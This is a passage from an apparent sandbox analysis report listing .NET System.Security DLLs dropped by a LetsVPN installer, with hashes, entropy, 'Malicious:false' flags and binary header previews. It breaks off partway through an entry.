                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25120
                                                                                                                                                                                                  Entropy (8bit):6.445252190247148
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:MbhigwLAuZtM66g/Id7WVXWOhqWOHlLf2KQcvBZ9uoS+ShjmM6IGBkS2:MbhzkKsfq3b2KZBZjS+ST6nkV
                                                                                                                                                                                                  MD5:3C8BB7E74003ADB157ED9DE3AEFDDA22
                                                                                                                                                                                                  SHA1:361D696A22BD3213EF0890618374B9258248001D
                                                                                                                                                                                                  SHA-256:105B44C610BA66582F8424FADABED94E3F1C75B5406D08FDFB949AFAF37ED9D6
                                                                                                                                                                                                  SHA-512:94531ADDEA34271A39AE2BC9FA73A8AEF518F84D884F4335AA2EC03E8EE7974556769E7E83E13B14F0B8FBEDFD7935C38CCB249C55EC6A588C8EB947F1A761B8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..*.........."H... ...`....... ..............................kA....@..................................G..O....`...............4.. ............F............................................... ............... ..H............text...((... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................H......H.......P ...%...................F......................................BSJB............v4.0.30319......l.......#~..........#Strings.....#......#US..#......#GUID....#......#Blob......................3................................................_.........................8.....8...*.8.....8.....8.....8.....8.....8.........*.8.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.+...K.K...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.AccessControl.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):38432
                                                                                                                                                                                                  Entropy (8bit):6.157953366104177
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:AlM7Ke5/WBkyN1hCq3b2KZBZaS+ST6nkm:AlM7KuulLN3qKk/mA
                                                                                                                                                                                                  MD5:59A2081C8387D01F9E9B25D45F5E3912
                                                                                                                                                                                                  SHA1:C829687DC9236D0B311B08565D28A2D0B9B3DA94
                                                                                                                                                                                                  SHA-256:382FFAA544AC83787AB00D63B987C2B97D12A22DD3791D38059312634FB45F4B
                                                                                                                                                                                                  SHA-512:69F06C088E4318FCDE9C164E598AB1B2172546257256F12A50D7C03EE8CEEDA8FCC930FD395E196B1F8AC17171925129A0E7F52E20138A4D92536A6FB0A30E30
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..Z...........x... ........... ...............................V....`..................................x..O....................h.. ............w..T............................................ ............... ..H............text....X... ...Z.................. ..`.rsrc................\..............@..@.reloc...............f..............@..B.................x......H........%..p5..........P[.......w.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Claims.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.971970551537452
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:fUcX6W9aWHhqWOHlLf2KQcvBZ9/ctcS+ShjmM6IGBkSg:fUchNq3b2KZBZy6S+ST6nkH
                                                                                                                                                                                                  MD5:7F432B8CB1B9666E95B618CE152112ED
                                                                                                                                                                                                  SHA1:27E679D4F2C59C1ADEB47DBA513A9CAD4CDB4EBC
                                                                                                                                                                                                  SHA-256:61E8A2E9A723EE9F11E5EB31C1B6C34E74EC62CB31DDB2A6CC61EB3B356D3073
                                                                                                                                                                                                  SHA-512:ECE55941FAE54A0A4D9EA66A79CB420FF193C4B4158F46FC0E3B281277F007F2F983D20D975977BD26C636CD3DC654907CCA0F9894CFE5D4199C33840B75BC8A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............B)... ...@....... ....................................@..................................(..O....@.................. ....`.......'............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$)......H.......P ......................8'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....(.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Algorithms.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):42528
                                                                                                                                                                                                  Entropy (8bit):6.052173413564498
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:doBj7kS+8mjvHTeaWKs0Sd4eeVq3b2KZBZPLj0S+ST6nk/:APmb9WKs0Peew3qKO/mp
                                                                                                                                                                                                  MD5:347B1F63D4419C5C8C4C6555E925EB18
                                                                                                                                                                                                  SHA1:1523D3060F7D91E1A6227B0C4D02375B9E80CC14
                                                                                                                                                                                                  SHA-256:DC4A3D2211B84690BDCF1FDCF4A82DD08F0E2168BF7715E2AD3B200442C9C77C
                                                                                                                                                                                                  SHA-512:43369FAA4E1BA0C84BC3D0445BEA4AB9B0CC435E84E836DE826348434772BE83674FB30AB96DFB42180FF23381772A219CB688F01256339FF61FC74B49738C55
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..h.............. ........... ....................................@.................................u...O.......8............x.. ............................................................ ............... ..H............text....f... ...h.................. ..`.rsrc...8............j..............@..@.reloc...............v..............@..B........................H.......P'..\8..........._...%..,.......................................j~....%-.&(F...s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2rI..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2r9..p.(....*2rm..p.(....*2r...p.(....*2r...p.(....*2r=..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Cng.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.7932969552567215
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:MldtuO/q3p4YN5XYwWCfWxahqWOHlLf2KQcvBZ9uWKdS+ShjmM6IGBkSM:MlJSZBXY4I+q3b2KZBZH2S+ST6nkD
                                                                                                                                                                                                  MD5:2893F2AF6EE2C60B3F531B4956BF170F
                                                                                                                                                                                                  SHA1:43F0672691EAE2A6D986E4280F7635D0BBE396F0
                                                                                                                                                                                                  SHA-256:9658DD8AFFCF9017C1F290C3E484EAD20A4EAE85DDB3FFAA8F718C6189D18F31
                                                                                                                                                                                                  SHA-512:EF257A6B647405CD2675C1513E64AC5E537D8ACA4C9C9910476F730DA8839CD177A50B7A4575331BFF9E68A10DC77132800430011F5DFAD9FFF7CCE8E55825FE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...q............." ..0.............j:... ...@....... ....................................`..................................:..O....@...............&.. ....`.......9..T............................................ ............... ..H............text...p.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B................L:......H.......|!..............t6.. ....8......................................:.(......}....*..{....*"..(....*"..(....*"..(....*..(....*..(....*..(....*..(....*:.(......}....*..{....*:.(......}....*..{....*:.(......}....*..{....*..(....*:.(......}....*..{....*^.(...........%...}....*:.(......}....*..{....*z.(......}...........%...}....*V.(......}......}....*..{....*..{....*..BSJB............v4.0.30319......l.......#~..@.......#Strings....T.......#US.X.......#GUID...h.......#Blob...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Csp.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.998855723947473
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:LTI2pWPzW+hqWOHlLf2KQcvBZ9dfaxGS+ShjmM6IGBkSOu:LE33q3b2KZBZaxGS+ST6nkRu
                                                                                                                                                                                                  MD5:1EA2C6268DE97149C3B6F120A6E52B83
                                                                                                                                                                                                  SHA1:6438DA3D482FE874ADEC765AA9624A540D5DB686
                                                                                                                                                                                                  SHA-256:A240D7B8C60B82A75F54E418FFABED591A35282D09CEFAF4DEC3AE5264D9F71F
                                                                                                                                                                                                  SHA-512:C7C6DDD2E225249DF5A4E8D6A99857E5402E5526BEE9FCF35A18D6A430BFCEC280570BFDB5D3CAC1E53EC35A6B64CD3965F948AC01347077007B4177F666CA38
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............^)... ...@....... ...............................T....@..................................)..O....@..`............... ....`.......'............................................... ............... ..H............text...d.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................@)......H.......P ......................T'......................................BSJB............v4.0.30319......l.......#~..,.......#Strings............#US.........#GUID...........#Blob......................3......................................z...........A...\.A...0.....a.....D.................C.................[.....x.....-.........................(.....(.....(...).(...1.(...9.(...A.(...I.(...Q.(...Y.(...a.(...i.(...q.(.......................#.....+.....3.....;."...C.=...K.]...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Encoding.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.01043644984067
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:+cezoy4W04WOmhqWOHlLf2KQcvBZ9+LS+ShjmM6IGBkSIh:+Bzoy+jq3b2KZBZoS+ST6nkzh
                                                                                                                                                                                                  MD5:9D3DD05A7105339169ADDE890C88AC83
                                                                                                                                                                                                  SHA1:9F6BD6BFA1ED1D82F96EC1F418880F2662E9DC7D
                                                                                                                                                                                                  SHA-256:ACA4ED3642A63D01A20C168BF8ED9F6CC08B6385D5219C5948BBB60B75C7DB2F
                                                                                                                                                                                                  SHA-512:DF88BA3D85F09D7DE7212707C1E3F3916794F76312061C69AEA4F14C3DED36525A6824A4AAFD6CCECE737860921B8D7F29286D445AA749B3D8331D3ECE217D93
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............~)... ...@....... ....................................@.................................,)..O....@.................. ....`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`)......H.......P ..$...................t'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID....... ...#Blob......................3..................................................f...o.f...C.S.........W.................V...........%.....n...........@.....)...................M.....M.....M...).M...1.M...9.M...A.M...I.M...Q.M...Y.M...a.M...i.M...q.M.......................#.....+.....3.....;.'...C.B...K.b...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Pkcs.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22560
                                                                                                                                                                                                  Entropy (8bit):6.76183219276718
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:HyBGXZp94Yi06W82W8hqWOHlLf2KQcvBZ9VI3UZS+ShjmM6IGBkSQD:emZp9ZwMq3b2KZBZ8aS+ST6nkv
                                                                                                                                                                                                  MD5:68B46F5451304425F315AFF4154D34C6
                                                                                                                                                                                                  SHA1:E1C2B91BC255A40BD4116EDB17BF967014D4648A
                                                                                                                                                                                                  SHA-256:70CC659047E6231809038FD239AA3C04748959DE3970515D7E32469F8CC9B136
                                                                                                                                                                                                  SHA-512:67927FE36F3286AD517990179E9F107F0EC8CE26D66BD2ADF0B712FA01D30C69EA7DAE67E8E660B3381825939E5155297E668577F2282429EBCDB6163D755D7D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....J..........." ..0.............Z=... ...@....... ..............................!.....`..................................=..O....@..X............*.. ....`.......<..T............................................ ............... ..H............text...`.... ...................... ..`.rsrc...X....@....... ..............@..@.reloc.......`.......(..............@..B................;=......H........!..............d9.. ....;......................................:.(......}....*..{....*"..(....*"..(....*"..(....*"..(....*"..(....*..(....*..(....*..(....*..(....*:.(......}....*..{....*:.(......}....*..{....*:.(......}....*..{....*..(....*:.(......}....*..{....*^.(...........%...}....*:.(......}....*..{....*z.(......}...........%...}....*V.(......}......}....*..{....*..{....*BSJB............v4.0.30319......l...h...#~......0...#Strings............#US.........#GUID...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Primitives.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.912984335281838
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:1H/JWKpWphqWOHlLf2KQcvBZ95NS+ShjmM6IGBkSY:1H/jEq3b2KZBZBS+ST6nkv
                                                                                                                                                                                                  MD5:BF8033D65A2C318D533909CAA8EB3270
                                                                                                                                                                                                  SHA1:A1367CCEA0575FC7E6AED5892389359F222AC358
                                                                                                                                                                                                  SHA-256:FDC059C9E4746A88925168F89011C30BC1FE4F36A8B2039AD94042ED9DA5F5D7
                                                                                                                                                                                                  SHA-512:12FC27E9BC76245972F599264549126D8A7692EC1C1F72ACFB3C6596D9A90981DE04C1446CBA3E5DB4F7855E2AF0A6915C6CE42822284BC67EE1F807AC6475E6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0............."*... ...@....... ...............................`....@..................................)..O....@.................. ....`.......(............................................... ............... ..H............text...(.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l...$...#~..........#Strings............#US.........#GUID....... ...#Blob......................3............................................................o.s...........D.....D.....D.....D...8.D...Q.D.....D.....D...l.....U.D.................m.....m.....m...).m...1.m...9.m...A.m...I.m...Q.m...Y.m...a.m...i.m...q.m.......................#.....+.....3.....;.)...C.D...K.d...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.ProtectedData.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.828657815336929
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:J4YlS5PWAb6jDW5hqWOHlLf2KQcvBZ9M2S+ShjmM6IGBkSss:JmY+q3b2KZBZLS+ST6nkxs
                                                                                                                                                                                                  MD5:56A6C05FF05053C5215402E40EE616D4
                                                                                                                                                                                                  SHA1:785AF2FD4E16AFF0C51C22A8AE993C6A55AD693D
                                                                                                                                                                                                  SHA-256:D62B71BDFA516FC9E01D872B293F6388F4E6F9D297DBFD68C6B345ED8BC21C52
                                                                                                                                                                                                  SHA-512:D6B49C38D7ACDCEE2FC7C04326C73E6806FE2F87E5E2FC4565EA20F469C95E7F4464058342F1CD09B6FB63BC6BDBD16B11CB6A4CC4346250F675AFAD1BD5811D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H.W..........." ..0..............9... ...@....... ....................................`.................................M9..O....@...............&.. ....`......88..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................9......H........!...............5..0....7......................................:.(......}....*..{....*"..(....*"..(....*"..(....*"..(....*"..(....*..(....*..(....*..(....*..(....*:.(......}....*..{....*:.(......}....*..{....*:.(......}....*..{....*..(....*:.(......}....*..{....*^.(...........%...}....*:.(......}....*..{....*z.(......}...........%...}....*V.(......}......}....*..{....*..{....*BSJB............v4.0.30319......l.......#~..0.......#Strings............#US.........#GUID...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.X509Certificates.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18464
                                                                                                                                                                                                  Entropy (8bit):6.860394751504702
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ITjbocNsWMhW2hqWOHlLf2KQcvBZ9F7S+ShjmM6IGBkSsrR:cboYyJq3b2KZBZjS+ST6nkhR
                                                                                                                                                                                                  MD5:0E4AFDD81561BB3250CE3A82745D0A06
                                                                                                                                                                                                  SHA1:B2152832A8329C9946FA76AEBBB640C00CC30F65
                                                                                                                                                                                                  SHA-256:0F61A4928C67EA462B906F899CCE93A800274C6293A5806AB423BDC409F827F7
                                                                                                                                                                                                  SHA-512:5091F12DAE47557EEA47956EAFE1246EAF703136D232EC14E20E383E57D261386F6CDCD453E5A4DDAE0F3883B0434141ED0E27AB82047372AD3B1042A87720E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.................. ...@....... ...............................o....@..................................-..O....@.................. ....`.......,............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P .......................,......................................BSJB............v4.0.30319......l.......#~......|...#Strings....x.......#US.|.......#GUID.......(...#Blob......................3................................'.....).........u.................=......."...:."...W.".....".....".....".....".....".....[.....".................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;./...C.J...K.j...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Xml.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):52256
                                                                                                                                                                                                  Entropy (8bit):5.867121098890678
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:tszrvuWznnuJlMeEM8Hy8d4Vx50lAhDVC+mq3b2KZBZcaS+ST6nksL:tgrvuqcP8RE5tQ+J3qKH/mqL
                                                                                                                                                                                                  MD5:438EA6C5B869E778CD9B96D37A827BBF
                                                                                                                                                                                                  SHA1:2F12F7ECC47EF9C2BD899811343BD49BE1AC74DA
                                                                                                                                                                                                  SHA-256:1A64B14FB86A517CBB62319543BBB2BE415B5FFF7E52FC356BAEB5E549267F38
                                                                                                                                                                                                  SHA-512:5E0E170DBE2AF3BE6B975EE33D87E8C26097A8C4F722EEAD41EE8F7815D29B17DD845B8BA2AD1FC85D6963D7EFBD950B646770465E5F37F04D90416301207844
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0................. ........... ...................................`.....................................O.......4............... ...............T............................................ ............... ..H............text....... ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B.......................H........&...K...........q.. ............................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Permissions.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):30240
                                                                                                                                                                                                  Entropy (8bit):6.439683136275158
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:T47XzsCggQsW7Sl8xjP/QZsq3b2KZBZQS+ST6nkt:k7XgpRxb/kn3qKe/m3
                                                                                                                                                                                                  MD5:4E6698EF08CFF72D265F37D91F40B32F
                                                                                                                                                                                                  SHA1:4C3FD998F328AA109C8F06DA48233A0E97BBF140
                                                                                                                                                                                                  SHA-256:B668AFE067181342CDE9BCE756D559DBB89A77CF57C6D43248209F9D5B9E5123
                                                                                                                                                                                                  SHA-512:CE2BB74A70875A97372859C6D857898217747C180B546439958C0B3DF0C525CE1857D4942590CAEDDA4E06A1C7BD8BD24E17422E07CDF2D87285D878BDE9175E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0............." ..0..>..........r]... ...`....... ..............................U.....`..................................]..O....`...............H.. ...........(\..T............................................ ............... ..H............text...x=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............F..............@..B................S]......H........#...2..........0U..x....[.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Principal.Windows.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.817500254068075
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:rEwo6eTs14YY4cWpOWqhqWOHlLf2KQcvBZ9tm9dZS+ShjmM6IGBkSlp:AwDdT+q3b2KZBZcS+ST6nkYp
                                                                                                                                                                                                  MD5:593DCCB65E6B3FA04C7BAF70468FB246
                                                                                                                                                                                                  SHA1:604295C9FCE17F74C615F01099F299B893DC578A
                                                                                                                                                                                                  SHA-256:9DB72960541B2D616BE36E4B93A6A1E175C3BA19FF499F4FA52F65BE9B0A118D
                                                                                                                                                                                                  SHA-512:1B3F9D7CF29B55AE376144642DDACEB4F838D74B4FECC1F43B51ED773011020E6FD3CB2DCC4882CFCFD815873EF36DB8C37F2B3EE4BDEF5C04E32C896354520A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....r..........." ..0.............V8... ...@....... ....................................`..................................8..O....@...............$.. ....`.......6..T............................................ ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................68......H.......|!..............\4.. ...|6......................................:.(......}....*..{....*"..(....*"..(....*"..(....*..(....*..(....*..(....*..(....*:.(......}....*..{....*:.(......}....*..{....*:.(......}....*..{....*..(....*:.(......}....*..{....*^.(...........%...}....*:.(......}....*..{....*z.(......}...........%...}....*V.(......}......}....*..{....*..{....*..BSJB............v4.0.30319......l.......#~..@.......#Strings....8.......#US.<.......#GUID...L.......#Blob...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Principal.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.955751189727143
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:qSKiWIhWghqWOHlLf2KQcvBZ9s4WS+ShjmM6IGBkSavP:qSK8Tq3b2KZBZLWS+ST6nkPn
                                                                                                                                                                                                  MD5:12E1F87B4E4AE9C1B2C0B869C1C245D0
                                                                                                                                                                                                  SHA1:0827BCB962BF1A46FB2FCDFF1650E659E8B571F9
                                                                                                                                                                                                  SHA-256:B150643E26EF1B14B56F2937943E7A33386A8EDEA200219350B65C1998624973
                                                                                                                                                                                                  SHA-512:E7C0D6E031B82F6C11A35587AAD76C3C50E0ABAFD55CADF8A17F79C095B59811B1082FFF18D9C9CD67742627F161D4B7D72A64F542D540F244289761F206DDD8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ...................................@.................................t(..O....@.. ............... ....`......<'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P ..l....................&......................................BSJB............v4.0.30319......l.......#~......@...#Strings....D.......#US.H.......#GUID...X.......#Blob......................3......................................................\.....0.....'.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.SecureString.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.896920735077221
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:/0KbZWApWmWTpWmyhqWOHlLf2KQcvBZ9Qr3RS+ShjmM6IGBkSAB0i:sKRylGq3b2KZBZyhS+ST6nkR0i
